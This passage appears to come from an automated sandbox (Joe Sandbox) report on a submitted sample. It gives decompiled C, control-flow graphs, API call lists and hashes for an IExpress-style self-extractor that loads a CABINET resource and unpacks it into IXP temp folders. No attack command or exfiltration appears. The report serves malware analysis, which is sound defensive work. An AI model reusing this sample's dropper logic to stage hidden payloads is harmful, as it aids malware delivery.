                                                                                                                                                                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4237285672-0
                                                                                                                                                                                                    • Opcode ID: ec4e7f489df4a41b7ca9717f267e732155485ff91dde4a5ef37d4df55c4bf6d5
                                                                                                                                                                                                    • Instruction ID: 94df0fecef74460bedaaf203c662e79ef9df88a44d227b992e71a6fb72e19863
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec4e7f489df4a41b7ca9717f267e732155485ff91dde4a5ef37d4df55c4bf6d5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4471B2B190121CAFEB15DB74CC85FFA77AEEB88750F0841ABF405D6240DA749E85AB24
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 374 fd4fe0-fd501a call fd468f FindResourceA LoadResource LockResource 377 fd5161-fd5163 374->377 378 fd5020-fd5027 374->378 379 fd5029-fd5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 fd5057-fd505e call fd4efd 378->380 379->380 383 fd507c-fd50b4 380->383 384 fd5060-fd5077 call fd44b9 380->384 389 fd50e8-fd5104 call fd44b9 383->389 390 fd50b6-fd50da 383->390 388 fd5107-fd510e 384->388 392 fd511d-fd511f 388->392 393 fd5110-fd5117 FreeResource 388->393 399 fd5106 389->399 398 fd50dc 390->398 390->399 396 fd513a-fd5141 392->396 397 fd5121-fd5127 392->397 393->392 401 fd515f 396->401 402 fd5143-fd514a 396->402 397->396 400 fd5129-fd5135 call fd44b9 397->400 405 fd50e3-fd50e6 398->405 399->388 400->396 401->377 402->401 403 fd514c-fd5159 SendMessageA 402->403 403->401 405->389 405->399
                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                    			E00FD4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				struct HWND__* _t9;
                                                                                                                                                                                                    				int _t10;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                                                    				struct HWND__* _t27;
                                                                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				CHAR* _t36;
                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __edi;
                                                                                                                                                                                                    				_t36 = "CABINET";
                                                                                                                                                                                                    				 *0xfd9144 = E00FD468F(_t36, 0, 0);
                                                                                                                                                                                                    				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                    				 *0xfd9140 = _t8;
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					return _t8;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t9 =  *0xfd8584; // 0x0
                                                                                                                                                                                                    				if(_t9 != 0) {
                                                                                                                                                                                                    					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                    					ShowWindow(GetDlgItem( *0xfd8584, 0x841), 5); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t10 = E00FD4EFD(0, 0); // executed
                                                                                                                                                                                                    				if(_t10 != 0) {
                                                                                                                                                                                                    					__imp__#20(E00FD4CA0, E00FD4CC0, E00FD4980, E00FD4A50, E00FD4AD0, E00FD4B60, E00FD4BC0, 1, 0xfd9148, _t33);
                                                                                                                                                                                                    					_t34 = _t10;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                    						_t29 =  *0xfd9148; // 0x0
                                                                                                                                                                                                    						_t24 =  *0xfd8584; // 0x0
                                                                                                                                                                                                    						E00FD44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__#22(_t34, "*MEMCAB", 0xfd1140, 0, E00FD4CD0, 0, 0xfd9140); // executed
                                                                                                                                                                                                    					_t37 = _t10;
                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__#23(_t34); // executed
                                                                                                                                                                                                    					if(_t10 != 0) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t27 =  *0xfd8584; // 0x0
                                                                                                                                                                                                    					E00FD44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					_t12 =  *0xfd9140; // 0x0
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						FreeResource(_t12);
                                                                                                                                                                                                    						 *0xfd9140 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                    						_t47 =  *0xfd91d8; // 0x0
                                                                                                                                                                                                    						if(_t47 == 0) {
                                                                                                                                                                                                    							E00FD44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(( *0xfd8a38 & 0x00000001) == 0 && ( *0xfd9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                    						SendMessageA( *0xfd8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t37;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
















                                                                                                                                                                                                    0x00fd4fe0
                                                                                                                                                                                                    0x00fd4fe6
                                                                                                                                                                                                    0x00fd4ff9
                                                                                                                                                                                                    0x00fd500d
                                                                                                                                                                                                    0x00fd5013
                                                                                                                                                                                                    0x00fd501a
                                                                                                                                                                                                    0x00fd5163
                                                                                                                                                                                                    0x00fd5163
                                                                                                                                                                                                    0x00fd5020
                                                                                                                                                                                                    0x00fd5027
                                                                                                                                                                                                    0x00fd5037
                                                                                                                                                                                                    0x00fd5051
                                                                                                                                                                                                    0x00fd5051
                                                                                                                                                                                                    0x00fd5057
                                                                                                                                                                                                    0x00fd505e
                                                                                                                                                                                                    0x00fd50a7
                                                                                                                                                                                                    0x00fd50ad
                                                                                                                                                                                                    0x00fd50b4
                                                                                                                                                                                                    0x00fd50e8
                                                                                                                                                                                                    0x00fd50e8
                                                                                                                                                                                                    0x00fd50ee
                                                                                                                                                                                                    0x00fd50ff
                                                                                                                                                                                                    0x00fd5104
                                                                                                                                                                                                    0x00fd5106
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5106
                                                                                                                                                                                                    0x00fd50cd
                                                                                                                                                                                                    0x00fd50d3
                                                                                                                                                                                                    0x00fd50da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd50dd
                                                                                                                                                                                                    0x00fd50e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5060
                                                                                                                                                                                                    0x00fd5060
                                                                                                                                                                                                    0x00fd5070
                                                                                                                                                                                                    0x00fd5075
                                                                                                                                                                                                    0x00fd5107
                                                                                                                                                                                                    0x00fd5107
                                                                                                                                                                                                    0x00fd510e
                                                                                                                                                                                                    0x00fd5111
                                                                                                                                                                                                    0x00fd5117
                                                                                                                                                                                                    0x00fd5117
                                                                                                                                                                                                    0x00fd511f
                                                                                                                                                                                                    0x00fd5121
                                                                                                                                                                                                    0x00fd5127
                                                                                                                                                                                                    0x00fd5135
                                                                                                                                                                                                    0x00fd5135
                                                                                                                                                                                                    0x00fd5127
                                                                                                                                                                                                    0x00fd5141
                                                                                                                                                                                                    0x00fd5159
                                                                                                                                                                                                    0x00fd5159
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd515f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
                                                                                                                                                                                                      • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
                                                                                                                                                                                                      • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
                                                                                                                                                                                                      • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
                                                                                                                                                                                                      • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00FD4FFE
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00FD5006
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00FD500D
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000842), ref: 00FD5030
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00FD5037
                                                                                                                                                                                                    • GetDlgItem.USER32(00000841,00000005), ref: 00FD504A
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00FD5051
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00FD5111
                                                                                                                                                                                                    • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00FD5159
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                    • API String ID: 1305606123-2642027498
                                                                                                                                                                                                    • Opcode ID: 290437734e140b0822ae6cd5150d40ac5b1c0319c2bf4f5d3c2886e64f0c961d
                                                                                                                                                                                                    • Instruction ID: c9ddc02f4ed5ce84fa6029fd9f6eafba9d688fd57d6cab3ba4c5cd89c68a1715
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 290437734e140b0822ae6cd5150d40ac5b1c0319c2bf4f5d3c2886e64f0c961d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1231FA71A4231A7BD7105BB1EC8EF27376FA744BA5F0C0017F90192391DAB8DC40B655
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E00FD53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                                    				CHAR* _t20;
                                                                                                                                                                                                    				int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				CHAR* _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t5 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                    				_t32 = __edx;
                                                                                                                                                                                                    				_t20 = __ecx;
                                                                                                                                                                                                    				_t29 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					E00FD171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                    					_t34 = _t34 + 0x10;
                                                                                                                                                                                                    					_t29 = _t29 + 1;
                                                                                                                                                                                                    					E00FD1680(_t32, 0x104, _t20);
                                                                                                                                                                                                    					E00FD658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                    					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                    					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                    					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t29 < 0x190) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t30 = 0;
                                                                                                                                                                                                    					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                    						_t30 = 1;
                                                                                                                                                                                                    						DeleteFileA(_t32);
                                                                                                                                                                                                    						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return E00FD6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                    				if(_t14 == 0) {
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t30 = 1;
                                                                                                                                                                                                    				 *0xfd8a20 = 1;
                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x00fd53ac
                                                                                                                                                                                                    0x00fd53b3
                                                                                                                                                                                                    0x00fd53b9
                                                                                                                                                                                                    0x00fd53bb
                                                                                                                                                                                                    0x00fd53bd
                                                                                                                                                                                                    0x00fd53bf
                                                                                                                                                                                                    0x00fd53d1
                                                                                                                                                                                                    0x00fd53d6
                                                                                                                                                                                                    0x00fd53e0
                                                                                                                                                                                                    0x00fd53e2
                                                                                                                                                                                                    0x00fd53f5
                                                                                                                                                                                                    0x00fd53fb
                                                                                                                                                                                                    0x00fd5402
                                                                                                                                                                                                    0x00fd540b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5413
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5415
                                                                                                                                                                                                    0x00fd5416
                                                                                                                                                                                                    0x00fd5427
                                                                                                                                                                                                    0x00fd542a
                                                                                                                                                                                                    0x00fd542b
                                                                                                                                                                                                    0x00fd5434
                                                                                                                                                                                                    0x00fd5434
                                                                                                                                                                                                    0x00fd543a
                                                                                                                                                                                                    0x00fd544c
                                                                                                                                                                                                    0x00fd544c
                                                                                                                                                                                                    0x00fd5452
                                                                                                                                                                                                    0x00fd545a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd545e
                                                                                                                                                                                                    0x00fd545f
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD171E: _vsnprintf.MSVCRT ref: 00FD1750
                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD53FB
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5402
                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD541F
                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD542B
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5434
                                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5452
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                    • API String ID: 1082909758-3746127100
                                                                                                                                                                                                    • Opcode ID: e1220f8335dd41af6fe35fa063d3d1c80747b448f1d1186debb71bf15ecf2c12
                                                                                                                                                                                                    • Instruction ID: 8cb73efb2789e8bbac52965506306cab54835ad6724761aefbfeb29c3bfde6bf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1220f8335dd41af6fe35fa063d3d1c80747b448f1d1186debb71bf15ecf2c12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A11087170250877D310AB369C49F9F375FEFC6721F040017F546D2390CE788982A666
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 478 fd5467-fd5484 479 fd551c-fd5528 call fd1680 478->479 480 fd548a-fd5490 call fd53a1 478->480 484 fd552d-fd5539 call fd58c8 479->484 483 fd5495-fd5497 480->483 485 fd549d-fd54c0 call fd1781 483->485 486 fd5581-fd5583 483->486 493 fd554d-fd5552 484->493 494 fd553b-fd5545 CreateDirectoryA 484->494 495 fd550c-fd551a call fd658a 485->495 496 fd54c2-fd54d8 GetSystemInfo 485->496 489 fd558d-fd559d call fd6ce0 486->489 500 fd5585-fd558b 493->500 501 fd5554-fd5557 call fd597d 493->501 498 fd5577-fd557c call fd6285 494->498 499 fd5547 494->499 495->484 505 fd54fe 496->505 506 fd54da-fd54dd 496->506 498->486 499->493 500->489 507 fd555c-fd555e 501->507 508 fd5503-fd5507 call fd658a 505->508 511 fd54df-fd54e2 506->511 512 fd54f7-fd54fc 506->512 507->500 513 fd5560-fd5566 507->513 508->495 515 fd54e4-fd54e7 511->515 516 fd54f0-fd54f5 511->516 512->508 513->486 517 fd5568-fd5575 RemoveDirectoryA 513->517 515->495 518 fd54e9-fd54ee 515->518 516->508 517->486 518->508
                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E00FD5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t10;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR* _t48;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t10 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				if(__edx == 0) {
                                                                                                                                                                                                    					_t48 = 0xfd91e4;
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E00FD1680(0xfd91e4, 0x104);
                                                                                                                                                                                                    					L14:
                                                                                                                                                                                                    					_t13 = E00FD58C8(_t48); // executed
                                                                                                                                                                                                    					if(_t13 != 0) {
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						_t42 = _a4;
                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							 *0xfd9124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                    							return E00FD6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t16 = E00FD597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                    						if(_t16 != 0) {
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t61 =  *0xfd8a20; // 0x0
                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                    							 *0xfd8a20 = 0;
                                                                                                                                                                                                    							RemoveDirectoryA(_t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                    						_t14 = 0;
                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                    						 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0xfd8a20 = 1;
                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 =  &_v268;
                                                                                                                                                                                                    				_t20 = E00FD53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t48 = 0xfd91e4;
                                                                                                                                                                                                    				E00FD1781(0xfd91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                    				if(( *0xfd9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E00FD658A(_t48, 0x104, 0xfd1140);
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				GetSystemInfo( &_v304);
                                                                                                                                                                                                    				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					_push("i386");
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					E00FD658A(_t48, 0x104);
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = _t26 - 1;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					_push("mips");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					_push("alpha");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t29 != 1) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push("ppc");
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}




















                                                                                                                                                                                                    0x00fd5472
                                                                                                                                                                                                    0x00fd5479
                                                                                                                                                                                                    0x00fd5481
                                                                                                                                                                                                    0x00fd5484
                                                                                                                                                                                                    0x00fd551c
                                                                                                                                                                                                    0x00fd5521
                                                                                                                                                                                                    0x00fd5528
                                                                                                                                                                                                    0x00fd552d
                                                                                                                                                                                                    0x00fd552f
                                                                                                                                                                                                    0x00fd5539
                                                                                                                                                                                                    0x00fd554d
                                                                                                                                                                                                    0x00fd554d
                                                                                                                                                                                                    0x00fd5552
                                                                                                                                                                                                    0x00fd5585
                                                                                                                                                                                                    0x00fd5585
                                                                                                                                                                                                    0x00fd558b
                                                                                                                                                                                                    0x00fd558d
                                                                                                                                                                                                    0x00fd559d
                                                                                                                                                                                                    0x00fd559d
                                                                                                                                                                                                    0x00fd5557
                                                                                                                                                                                                    0x00fd555e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5560
                                                                                                                                                                                                    0x00fd5566
                                                                                                                                                                                                    0x00fd5569
                                                                                                                                                                                                    0x00fd556f
                                                                                                                                                                                                    0x00fd556f
                                                                                                                                                                                                    0x00fd5581
                                                                                                                                                                                                    0x00fd5581
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5581
                                                                                                                                                                                                    0x00fd5545
                                                                                                                                                                                                    0x00fd557c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd557c
                                                                                                                                                                                                    0x00fd5547
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5547
                                                                                                                                                                                                    0x00fd548a
                                                                                                                                                                                                    0x00fd5490
                                                                                                                                                                                                    0x00fd5497
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd549d
                                                                                                                                                                                                    0x00fd54ab
                                                                                                                                                                                                    0x00fd54b4
                                                                                                                                                                                                    0x00fd54c0
                                                                                                                                                                                                    0x00fd550c
                                                                                                                                                                                                    0x00fd5511
                                                                                                                                                                                                    0x00fd5515
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5515
                                                                                                                                                                                                    0x00fd54c9
                                                                                                                                                                                                    0x00fd54d6
                                                                                                                                                                                                    0x00fd54d8
                                                                                                                                                                                                    0x00fd54fe
                                                                                                                                                                                                    0x00fd5503
                                                                                                                                                                                                    0x00fd5507
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd5507
                                                                                                                                                                                                    0x00fd54da
                                                                                                                                                                                                    0x00fd54dd
                                                                                                                                                                                                    0x00fd54f7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd54f7
                                                                                                                                                                                                    0x00fd54df
                                                                                                                                                                                                    0x00fd54e2
                                                                                                                                                                                                    0x00fd54f0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd54f0
                                                                                                                                                                                                    0x00fd54e7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd54e9
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD54C9
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD553D
                                                                                                                                                                                                    • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD556F
